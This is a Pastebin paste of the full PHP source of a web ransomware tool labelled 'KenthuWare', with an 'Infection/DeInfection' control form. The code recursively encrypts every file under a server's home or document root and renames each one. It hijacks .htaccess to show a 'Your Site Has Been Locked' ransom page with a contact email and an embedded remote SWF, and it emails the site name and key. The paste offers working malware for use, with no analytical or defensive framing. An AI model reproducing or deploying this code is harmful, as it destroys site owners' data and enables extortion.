Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html>
- <head>
- <title>KenthuWare</title>
- <style type="text/css">
- body {
- background: #1A1C1F;
- color: #e2e2e2;
- }
- .inpute{
- border-style: dotted;
- border-color: #379600;
- background-color: transparent;
- color: white;
- text-align: center;
- }
- .selecte{
- border-style: dotted;
- border-color: green;
- background-color: transparent;
- color: green;
- }
- .submite{
- border-style: dotted;
- border-color: #4CAF50;
- background-color: transparent;
- color: white;
- }
- .result{
- text-align: left;
- }
- </style>
- <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
- </head>
- <body>
- <div class="result">
- <?php
- error_reporting(0);
- set_time_limit(0);
- ini_set('memory_limit', '-1');
- class DNThirTeen {
- private static $op = 0xffffffff;
- public static function death($v, $k) {
- $vl = strlen($v);
- $filln = (8 - ($vl + 2)) % 8 + 2;
- if ($filln >= 2 && $filln < 9) {
- } else {
- $filln += 8;
- }
- $fills = '';
- for ($i = 0; $i < $filln; $i++) {
- $fills .= chr(rand(0, 0xff));
- }
- $v = chr(($filln - 2) | 0xF8) . $fills . $v;
- $tmp_l = strlen($v) + 7;
- $v = pack("a{$tmp_l}", $v);
- $tr = pack("a8", '');
- $to = pack("a8", '');
- $r = '';
- $o = pack("a8", '');
- for ($i = 0; $i < strlen($v); $i = $i + 8) {
- $o = self::_x0r(substr($v, $i, 8), $tr);
- $tr = self::_x0r(self::prepare_to_death($o, $k), $to);
- $to = $o;
- $r .= $tr;
- }
- return $r;
- }
- public static function life($v, $k) {
- $l = strlen($v);
- $prePlain = self::prepare_to_life($v, $k);
- $pos = (ord($prePlain[0]) & 0x07) + 2;
- $r = $prePlain;
- $preCrypt = substr($v, 0, 8);
- for ($i = 8; $i < $l; $i = $i + 8) {
- $x = self::_x0r(self::prepare_to_life(self::_x0r(substr($v, $i, $i + 8), $prePlain), $k), $preCrypt);
- $prePlain = self::_x0r($x, $preCrypt);
- $preCrypt = substr($v, $i, $i + 8);
- $r .= $x;
- }
- if (substr($r, -7) != pack("a7", '')) {
- return "";
- }
- return substr($r, $pos + 1, -7);
- }
- private static function _x0r($a, $b) {
- $a = self::_str2long($a);
- $a1 = $a[0];
- $a2 = $a[1];
- $b = self::_str2long($b);
- $b1 = $b[0];
- $b2 = $b[1];
- return self::_long2str(($a1 ^ $b1) & self::$op) . self::_long2str(($a2 ^ $b2) & self::$op);
- }
- public static function prepare_to_death($v, $k) {
- $s = 0;
- $delta = 0x9e3779b9;
- $n = 16;
- $k = self::_str2long($k);
- $v = self::_str2long($v);
- $z = $v[1];
- $y = $v[0];
- for ($i = 0; $i < $n; $i++) {
- $s += $delta;
- $y += (self::$op & ($z << 4)) + $k[0] ^ $z + $s ^ (self::$op & ($z >> 5)) + $k[1];
- $y &= self::$op;
- $z += (self::$op & ($y << 4)) + $k[2] ^ $y + $s ^ (self::$op & ($y >> 5)) + $k[3];
- $z &= self::$op;
- }
- return self::_long2str($y) . self::_long2str($z);
- }
- public static function prepare_to_life($v, $k) {
- $delta = 0x9e3779b9;
- $s = ($delta << 4) & self::$op;
- $n = 16;
- $v = self::_str2long($v);
- $k = self::_str2long($k);
- $y = $v[0];
- $z = $v[1];
- $a = $k[0];
- $b = $k[1];
- $c = $k[2];
- $d = $k[3];
- for ($i = 0; $i < $n; $i++) {
- $z -= (($y << 4) + $c) ^ ($y + $s) ^ (($y >> 5) + $d);
- $z &= self::$op;
- $y -= (($z << 4) + $a) ^ ($z + $s) ^ (($z >> 5) + $b);
- $y &= self::$op;
- $s -= $delta;
- $s &= self::$op;
- }
- return self::_long2str($y) . self::_long2str($z);
- }
- private static function _str2long($data) {
- $n = strlen($data);
- $tmp = unpack('N*', $data);
- $data_long = array();
- $j = 0;
- foreach ($tmp as $value) {
- $data_long[$j++] = $value;
- }
- return $data_long;
- }
- private static function _long2str($l) {
- return pack('N', $l);
- }
- }
- class DN13HandsomeWare {
- public function DnThirTeenpackInstall() {
- if (!file_exists(".htad3g1d5")) {
- rename(".htaccess", ".htad3g1d5");
- if (fwrite(fopen('.htaccess', 'w'), "#DNThirTeen\r\nDirectoryIndex d3g1d5.php\r\nErrorDocument 404 /d3g1d5.php\r\nErrorDocument 403 /d3g1d5.php\r\nErrorDocument 500 /d3g1d5.php")) {
- echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>';
- }
- if (file_put_contents("d3g1d5.php", '<html><head><title>Pwndz By [!]DNThirTeen</title></head><meta name="Description" content="Pwndz By [!]DNThirTeen"><body bgcolor="black"><center><br><br><br><br><br><br><br><br><br><br><br><br><font size="7" face="Britannic Bold" color="red">L . O . C . K . E . D</font><br><br><font face="Courier New Bold" size="5" color="white">Your Site Has Been Locked By [!]DNThirTeen<br><br><font face="Viner Hand ITC" size="4" color="lime">Contact me : <font color="white">g33k@israelmail.com</font></font><br><br></body><center><embed src="https://arlinjewels.com/deface.swf" height="2%" width="3.5%" type="application/x-shockwave-flash"></embed></html>')) {
- echo '<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> d3g1d5.php (Default Page)<br>';
- }
- }
- }
- public function DnThirTeenpackUnstall() {
- if (file_exists(".htad3g1d5")) {
- if (unlink(".htaccess") && unlink("d3g1d5.php")) {
- echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>';
- echo '<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> d3g1d5.php (Default Page)<br>';
- }
- rename(".htad3g1d5", ".htaccess");
- }
- }
- public function plus() {
- flush();
- ob_flush();
- }
- public function locate() {
- if (function_exists('posix_getpwuid') && function_exists('posix_getuid')) {
- $root = posix_getpwuid(posix_getuid());
- return $root['dir'];
- } else {
- return $_SERVER['DOCUMENT_ROOT'];
- }
- }
- public function DnThirTeendirs($dir, $method, $key) {
- switch ($method) {
- case '1':
- DN13HandsomeWare::DnThirTeenpackInstall();
- break;
- case '2':
- DN13HandsomeWare::DnThirTeenpackUnstall();
- break;
- }
- foreach (scandir($dir) as $d) {
- if ($d != '.' && $d != '..') {
- $locate = $dir . DIRECTORY_SEPARATOR . $d;
- if (!is_dir($locate)) {
- if (DN13HandsomeWare::whitelist($locate, ".htaccess") && DN13HandsomeWare::whitelist($locate, "d3g1d5.php") && DN13HandsomeWare::whitelist($locate, ".htad3g1d5")) {
- switch ($method) {
- case '1':
- DN13HandsomeWare::DnThirTeenEnCry($key, $locate);
- DN13HandsomeWare::DnThirTeenEnDesDirS($locate, "1");
- break;
- case '2':
- DN13HandsomeWare::DnThirTeenDeCry($key, $locate);
- DN13HandsomeWare::DnThirTeenEnDesDirS($locate, "2");
- break;
- }
- }
- } else {
- DN13HandsomeWare::DnThirTeendirs($locate, $method, $key);
- }
- }
- DN13HandsomeWare::plus();
- }
- DN13HandsomeWare::report($key);
- }
- public function report($key) {
- $message .= "=========___Kenthuware___=========\n";
- $message .= "Website : " . $_SERVER['HTTP_HOST'] . "\n";
- $message .= "Key : " . $key . "\n";
- $message .= "=========_Kenthu (2016) Ransomware_=========\n";
- $subject = "Report Ransomware";
- $headers = "From: DNThirTeen <g33k@israelmail.com>\r\n";
- mail($_POST['mail'], $subject, $message, $headers);
- }
- public function DnThirTeenEnDesDirS($locate, $method) {
- switch ($method) {
- case '1':
- rename($locate, $locate . ".d3g1d5");
- break;
- case '2':
- $locates = str_replace(".d3g1d5", "", $locate);
- rename($locate, $locates);
- break;
- }
- }
- public function DnThirTeenEnCry($key, $locate) {
- $data = file_get_contents($locate);
- $iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM);
- if (function_exists('mcrypt_encrypt') && function_exists('mcrypt_decrypt')) {
- $crypt = $iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data, MCRYPT_MODE_CBC, $iv);
- } else {
- $crypt = $data;
- }
- $encrypted = DNThirTeen::death($crypt, pack("H*", $key));
- if (file_put_contents($locate, "Encrypted By H34rtBl33d RansomWare___" . $encrypted)) {
- echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
- } else {
- echo '<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> ' . $locate . ' <br>';
- }
- }
- public function DnThirTeenDeCry($key, $locate) {
- $data = DNThirTeen::life(str_replace("Encrypted By H34rtBl33d RansomWare___", "", file_get_contents($locate)), pack("H*", $key));
- if (function_exists('mcrypt_decrypt') && function_exists('mcrypt_encrypt')) {
- $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
- $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv), "\0");
- } else {
- $decrypted = $data;
- }
- if (file_put_contents($locate, $decrypted)) {
- echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
- } else {
- echo '<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">' . $locate . '</font> <br>';
- }
- }
- public function whitelist($ext, $name) {
- $re = "/({$name})/";
- preg_match($re, $ext, $matches);
- if ($matches[1]) {
- return false;
- }
- return true;
- }
- }
- if ($_POST['submit']) {
- switch ($_POST['method']) {
- case '1':
- DN13HandsomeWare::DnThirTeendirs(DN13HandsomeWare::locate(), "1", $_POST['key']);
- break;
- case '2':
- DN13HandsomeWare::DnThirTeendirs(DN13HandsomeWare::locate(), "2", $_POST['key']);
- break;
- }
- } else {
- ?>
- <pre><font style="font-size:75%;"color="cyan">
- <b>
- /\
- ||
- ||
- ||
- || ~-----~
- || /===-- ---~~~
- || ;' /==~- -- - ---~~~
- || (/ (' /=---- ~~_ --( '
- || ' / ;' /=---- \__~
- ' ~==_=~ '(' ~-~~ ~~~~ ~~~--\~'
- \\ (c_\_ .i. /~-- ~~~-- -~ ( '
- `\ (}| / / : \ / ~~------~ ~~\ (
- \ ' ||/ \ |===| /~/ ~~~ \ \(
- ``~\ ~~\ )~.~_ >._.< _~-~ |`_ ~~-~ )\
- '-~ { / ) \___/ ( \ |` ` _ ~~ '
- \ -~\ -<__/ - - L~ -; \\ \ _ _/
- `` ~~=\ { : }\ ,\ || _ :(
- \ ~~=\__ \ _/ \_ / ) } _// ( `|'
- `` , ~\--~=\ \ / / _/ / ' ( '
- \` } ~ ~~ -~=\ _~_ / \ / \ )^ ( // :_ / '
- | , _~-' '~~__-_ / - |/ \ (
- \ ,_--_ _/ \_'---', -~ . \
- )/ /\ / /\ ,~, \__ _} \_ "~_
- , { ( _ )'} ~ - \_ ~\ (-:-) "\ ~
- /'' '' )~ \~_ ~\ )-> \ :| _, "
- (\ _/)''} | \~_ ~ /~( | :) / }
- <`` >;,,/ )= \~__ {{{ ' \ =( , , ;
- {o_o }_/ |v '~__ _ )-v| " : ,"
- {/"\_) {_/' \~__ ~\_ \\_} ' { /~\
- ,/! '_/ '~__ _-~ \_' : ' ," ~
- (''` /,'~___~ | / ," \ ~'
- '/, ) (-) '~____~"; ," , }
- /,') / \ / ,~-" '~'
- ( ''/ / ( ' / / '~'
- ~ ~ ,, /) , (/( \) ( -) /~'
- ( ~~ )` ~} ' \)' _/ / ~'
- { |) /`,--.( }' ' ( / /~'
- (` ~ ( c|~~| `} ) '/:\ ,'
- ~ )/``) )) '|), (/ | \)
- (` (-~(( `~`' ) ' (/ '
- `~' )'`') '
- ` ``
- ________ ________ _________ ___ ___ ___ ________ _________ _______ _______ ________
- |\ ___ \|\ ___ \|\___ ___|\ \|\ \|\ \|\ __ \|\___ ___|\ ___ \ |\ ___ \ |\ ___ \
- \ \ \_|\ \ \ \\ \ \|___ \ \_\ \ \\\ \ \ \ \ \|\ \|___ \ \_\ \ __/|\ \ __/|\ \ \\ \ \
- \ \ \ \\ \ \ \\ \ \ \ \ \ \ \ __ \ \ \ \ _ _\ \ \ \ \ \ \_|/_\ \ \_|/_\ \ \\ \ \
- \ \ \_\\ \ \ \\ \ \ \ \ \ \ \ \ \ \ \ \ \ \\ \| \ \ \ \ \ \_|\ \ \ \_|\ \ \ \\ \ \
- \ \_______\ \__\\ \__\ \ \__\ \ \__\ \__\ \__\ \__\\ _\ \ \__\ \ \_______\ \_______\ \__\\ \__\
- \|_______|\|__| \|__| \|__| \|__|\|__|\|__|\|__|\|__| \|__| \|_______|\|_______|\|__| \|__|
- </b>
- </font></pre><pre>
- -[ Contact : g33k@israelmail.com ]-<br>
- </pre>
- <form action="" method="post">
- <label>Key : </label>
- <input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC">
- <label> Email : </label>
- <input type="text" name="mail" class="inpute" placeholder="d3g1d5@gmail.com">
- <select name="method" class="selecte">
- <option value="1">Infection</option>
- <option value="2">DeInfection</option>
- </select>
- <input type="submit" name="submit" class="submite" value="Submit" />
- </form>
- <?php
- }
- ?>
- </div>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement